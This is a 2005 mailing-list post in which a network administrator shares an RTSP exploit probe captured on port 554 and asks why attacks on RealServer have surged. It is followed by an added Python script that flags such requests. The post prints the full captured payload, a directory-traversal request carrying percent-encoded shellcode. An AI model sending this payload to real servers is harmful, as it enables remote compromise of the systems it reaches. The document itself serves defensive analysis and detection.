THC's RealServer (port 554) exploit?

From: Stefan Pettersson (
Date: 02/16/05

    Date: Wed, 16 Feb 2005 17:53:07 +0100

    Hi, I'm kinda new in this field so, please bear with me.

    I've got a massive increase in connection requests to port 554 (RealServer) this
    afternoon. I haven't given much thought to earlier connections but when looking
    through the firewall log I see that I've gotten a few in the past as well. There is
    however no doubt that the traffic has increased _greatly_ this afternoon. (Almost)
    every attempt is sent by a different address. I don't know if these are decoys

    I was curious about this so I opened the port up and ran

    nc -l -p 554 > output

    to see what the probes tried to send. What I got was definitely an exploit attempt.

    DESCRIBE /../../../../ΜΜ%eb%15%b9%8b%e6%13%41%81%f1%39%e6%13%41%5e%80%74%31%ff%9e%e2%f9%eb%05%e8%e6%ff%ff%ff%ad%45%fa%15%dd%ae%15%de%92%15%ee%82%33%15%e6%96%76%db%9e%9e%9e%cd%c8%15%c1%a2%15%c2%a5%e6%9d%41%cd%15%c5%be%9d%41%cd%1d%5d%9a%15%ad%9d%69%ad%57%32%ac%56%5f%5f%9b%1a%5e%eb%68%b5%54%eb%77%c6%b5%46%4f%75%c0%9d%c0%ba%9d%41%f8%15%95%15%c0%82%9d%41%15%9a%15%9d%59%c0%c5%61%7e%c0%f6%ad%ac%9e%9e%f6%e9%ed%ac%c1%ca%24%0c%f0%9a%1a%61%48%15%66%1f%72%9e%9c%9e%9e%15%72%cd%f4%9f%f4%9c%24%1d%cd%1d%9e%61%48%cd%cd%f6%4d%43%8d%24%f6%9c%9e%7e%ec%15%4a%15%46%f4%8e%cc%cd%24%fd%ae%fe%c4%61%48%ce%2a%9c%ce%cb%cd%24%9e%c6%fe%7c%61%48%21%a3%36%27%f3%61%7b.smi RTSP/1.0

    I removed a "few" /../..

    I searched the web for this and found that this is an old exploit, most likely this

    But that one is almost two years old, why does it show up this much now? So suddenly.
    It has only been going on for a few hours. Is there something new that has come out
    or is it just a coincidence?

    Stefan Pettersson
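
Added example, not part of the original post: a Python triage for what a listener like the nc command above captures on port 554, flagging RTSP request lines by the traits visible in the probe (repeated ../, percent-encoded binary bytes, oversized URI). The thresholds, function names and sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# RTSP request line: METHOD SP Request-URI SP RTSP/x.y
REQUEST_LINE = re.compile(rb"^([A-Z_]+) (\S+) RTSP/(\d\.\d)\r?$")

# Thresholds are assumptions for this example; tune them to your own traffic.
MAX_URI_LEN = 256
MAX_TRAVERSALS = 2
MAX_BINARY_RATIO = 0.2

def triage_rtsp_line(line: bytes) -> list[str]:
    """Return the reasons a captured RTSP request line looks hostile (empty = clean)."""
    m = REQUEST_LINE.match(line)
    if not m:
        return ["malformed request line"]
    uri = m.group(2)
    decoded = unquote_to_bytes(uri)  # also exposes %2e%2e%2f-style traversal
    reasons = []
    if len(uri) > MAX_URI_LEN:
        reasons.append("overlong URI")
    if decoded.count(b"../") > MAX_TRAVERSALS:
        reasons.append("directory traversal")
    # Bytes outside printable ASCII have no place in a media path.
    binary = sum(1 for b in decoded if b < 0x20 or b > 0x7E)
    if binary / len(decoded) > MAX_BINARY_RATIO:
        reasons.append("binary payload in URI")
    return reasons

def triage_capture(data: bytes) -> list[tuple[bytes, list[str]]]:
    """Triage every request line in a raw capture such as the nc output file."""
    results = []
    for line in data.splitlines():
        if b" RTSP/" in line:  # request lines only; headers and bodies are skipped
            method = line.split(b" ", 1)[0]
            results.append((method, triage_rtsp_line(line)))
    return results

# Constructed samples (not taken from the post): one normal request, one probe-shaped.
BENIGN = b"DESCRIBE rtsp://media.example.com/clip.smi RTSP/1.0\r\nCSeq: 1\r\n\r\n"
PROBE = b"DESCRIBE /" + b"../" * 40 + b"%01%02%fe%ff" * 30 + b".smi RTSP/1.0\r\n\r\n"

if __name__ == "__main__":
    for method, reasons in triage_capture(BENIGN + PROBE):
        print(method.decode(), reasons or "clean")
```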
